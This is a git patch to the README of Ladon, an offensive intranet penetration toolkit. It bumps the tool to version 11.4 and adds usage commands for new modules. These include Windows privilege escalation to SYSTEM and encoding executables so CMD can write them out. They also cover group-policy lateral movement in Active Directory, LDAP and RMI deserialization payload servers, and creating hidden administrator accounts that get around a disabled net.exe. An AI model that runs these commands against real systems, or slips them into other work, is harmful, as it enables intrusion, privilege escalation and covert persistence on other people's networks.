From 69455d5787ce9189e69b934cffe62cd6d94262e7 Mon Sep 17 00:00:00 2001 From: k8gege <42312878+k8gege@users.noreply.github.com> Date: Mon, 7 Aug 2023 01:37:36 +0800 Subject: [PATCH] Add files via upload --- README.md | 116 ++++++++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 113 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index fcad1bf..dcf9aed 100644 --- a/README.md +++ b/README.md @@ -1,8 +1,8 @@ -## Ladon 11.0 20230618 +## Ladon 11.4 20230801 ![](https://k8gege.github.io/k8img/Ladon/Dragon.jpg) [![Author](https://img.shields.io/badge/Author-k8gege-blueviolet)](https://github.com/k8gege) -[![Ladon](https://img.shields.io/badge/Ladon-11.0-yellowgreen)](https://github.com/k8gege/Ladon) +[![Ladon](https://img.shields.io/badge/Ladon-11.4-yellowgreen)](https://github.com/k8gege/Ladon) [![Bin](https://img.shields.io/badge/Ladon-Bin-ff69b4)](https://github.com/k8gege/Ladon/releases) [![GitHub issues](https://img.shields.io/github/issues/k8gege/Ladon)](https://github.com/k8gege/Ladon/issues) [![Github Stars](https://img.shields.io/github/stars/k8gege/Ladon)](https://github.com/k8gege/Ladon) @@ -16,7 +16,7 @@ ### 程序简介 -Ladon大型内网渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。11.0版本内置234功能模块,网络资产探测模块30+协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16+包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计25+含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。 +Ladon大型内网渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。11.4版本内置245功能模块,网络资产探测模块30+协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16+包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计25+含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。 ### 使用简单 @@ -1595,9 +1595,119 @@ Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul" Ladon BypassAV py xor anyNet.exe ``` +##### 235 Win11/2022系统提权至system权限 +```Bash +Ladon McpPotato whoami +``` + +##### 236 EXE转HEX,CMD命令写入文件 +```Bash +Ladon Exe2Hex 1.exe +``` + +##### 237 EXE转Base64,CMD命令写入文件 +```Bash +Ladon Exe2B64 1.exe +``` + +##### 238 ZimbraVer Zimbra邮件系统版本探测 +```Bash +Ladon 192.168.1.8/24 ZimbraVer +Ladon http://192.168.1.8:8080 ZimbraVer +Ladon url.txt ZimbraVer +``` + +##### 239 SharpGPO域渗透 组策略横向移动工具 +```Bash +Ladon SharpGPO + +Ladon SharpGPO --Action GetOU +Ladon SharpGPO --Action GetOU --OUName "IT Support" + +Ladon SharpGPO --Action NewOU --OUName "IT Support" +Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com" + +Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com" +Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com" + +Ladon SharpGPO --Action RemoveOU --OUName "IT Support" +Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com" + + +Ladon SharpGPO --Action GetGPO +Ladon SharpGPO --Action GetGPO --GPOName testgpo + +Ladon SharpGPO --Action NewGPO --GPOName testgpo + +Ladon SharpGPO --Action RemoveGPO --GPOName testgpo +Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 + +Ladon SharpGPO --Action GetGPLink +Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com" +Ladon SharpGPO --Action GetGPLink --GPOName testgpo +Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 + +Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo +Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 + +Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo +Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 + +Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo +Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 + +Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice +Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users" +Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER +Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users" +Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice +Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users" +Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER +Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users" + +Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice +Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users" +Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER +Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users" +Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice +Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users" +Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER +Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users" +``` + +##### 240 IIS网站信息一键获取 +```Bash +Ladon IisInfo +``` + +##### 241 渗透专用WEB服务器LDAP反序列化 +```Bash +Ladon web 800 ldap=192.168.1.8:800 +``` + +##### 242 渗透专用WEB服务器RMI反序列化 +```Bash +Ladon web 800 rmi=192.168.1.8 +``` + +##### 243 API添加管理员(无视系统net、net1禁用) +```Bash +Ladon AddAdmin admin$ 123456 +``` + +##### 244 API添加用户(无视系统net、net1.exe禁用) +```Bash +Ladon AddUser admin$ 123456 +``` + +##### 245 API删除用户(无视系统net、net1.exe禁用) +```Bash +Ladon DelUser admin$ +``` ======================================================= + ### Example http://k8gege.org/Ladon/example-en.html